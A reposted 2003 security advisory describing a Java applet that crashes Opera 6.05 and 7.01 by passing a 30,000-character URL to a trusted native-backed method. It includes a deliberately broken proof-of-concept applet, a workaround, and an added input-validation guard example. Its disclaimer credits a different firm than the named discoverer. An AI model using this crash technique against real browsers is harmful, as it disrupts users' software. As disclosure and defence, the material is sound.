
Java-Applet crashes Opera 6.05 and 7.01

by Nikola Strahija on February 11th, 2003

Analyzing the public interfaces of the Opera Java class libraries, a special applet could be constructed that provokes a JNI call with an invalid parameter right into a vulnerable routine causing a Denial of Service.


Applet crashes Opera 6.05 and 7.01
===================================================
Vendor: Opera
Versions affected: Opera 6.05 / 7.01
Date: 3rd February 2003
Type of Vulnerability: Client DoS
Severity: High
Discovered by: Marc Schoenefeld, [email protected]
Online location: http://www.illegalaccess.org/java/OperaCall2.html
===================================================

By analyzing the public interfaces of the Opera Java class libraries, a special
applet could be constructed that provokes a JNI call with an invalid
parameter straight into a vulnerable routine, causing a Denial of Service!

Discovery date
3 Feb 2003.

Affected applications
Opera 6.05
Opera 7.01

Vendor Response
This is rather unpleasant: the Opera team does not respond to bug
reports, nor do they read their own forum entries, to which the bug was also
posted.

Solution
Until a patch becomes available, disable Java by going to: File ->
Preferences -> Multimedia, and uncheck the "Enable Java" item.

Analysis
Opera has its own class files in the opera.jar library. These are considered
trusted by the system policies, but they are also vulnerable to invalid
user input. In the proof-of-concept shown below, the showDocument
method of the PluginContext object is called with a URL object carrying a
very long string. Executing this method triggers a call to a native method,
which cannot handle the value and therefore causes a JVM crash, which in turn
crashes Opera 7.01. This was observed on Windows XP and Opera 6.05/7.01 with
Java enabled, directly calling the applet after installation.


//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are couple of obvious syntax errors to avoid script-kidding

...
import opera.PluginContext; // !! import the vulnerable class
...

public class OperaCall2 extends App1et
{

    public OperaCall2()
    {
    }

    public void paint(Graphics g)
    {
        PluginContext plugincontext = new PluginContext(l);
        try
        {
            plugincontext.showDocument(new URL("http://xxx.xxx"; + new String(new byte[30000])));
        }
        catch(Exception exception)
        {
            exception.printStackTrace();
        }
    }
}
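
The analysis describes a trusted class forwarding an unchecked URL value to native code. The following is an added illustration, not part of the advisory or of Opera's code: a hypothetical guard that a trusted wrapper could apply before the JNI call. The class name, the 2048-character limit and the http/https allow-list are assumptions.

```java
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Arrays;

/** Hypothetical guard in front of a native showDocument-style call (added example). */
public class ShowDocumentGuard {
    // Assumed limit: the advisory does not say what length the native routine tolerates.
    static final int MAX_URL_LENGTH = 2048;

    /** Returns the URL's external form if it may be handed to native code, else throws. */
    static String checkedExternalForm(URL url) {
        if (url == null) {
            throw new IllegalArgumentException("url is null");
        }
        String protocol = url.getProtocol();
        if (!"http".equals(protocol) && !"https".equals(protocol)) {
            throw new IllegalArgumentException("unsupported scheme: " + protocol);
        }
        String s = url.toExternalForm();
        if (s.length() > MAX_URL_LENGTH) {
            throw new IllegalArgumentException("URL too long: " + s.length() + " chars");
        }
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            // Reject NUL and other control characters before they reach native string handling.
            if (c < 0x20 || c == 0x7f) {
                throw new IllegalArgumentException("control character at index " + i);
            }
        }
        return s;
    }

    public static void main(String[] args) throws MalformedURLException {
        // Constructed inputs: an ordinary URL and one with a 30000-character path.
        char[] pad = new char[30000];
        Arrays.fill(pad, 'a');
        URL ok = new URL("http://example.com/index.html");
        URL oversized = new URL("http://example.com/" + String.valueOf(pad));

        System.out.println("accepted: " + checkedExternalForm(ok));
        try {
            checkedExternalForm(oversized);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected before native call: " + e.getMessage());
        }
    }
}
```

Validation of this kind belongs in the trusted class itself, since applet code can call its public methods directly with arbitrary arguments.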


Disclaimer
The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind. Beauchamp Security is not liable for
any direct or indirect damages caused as a result of using the information
or demonstrations provided in any part of this advisory.

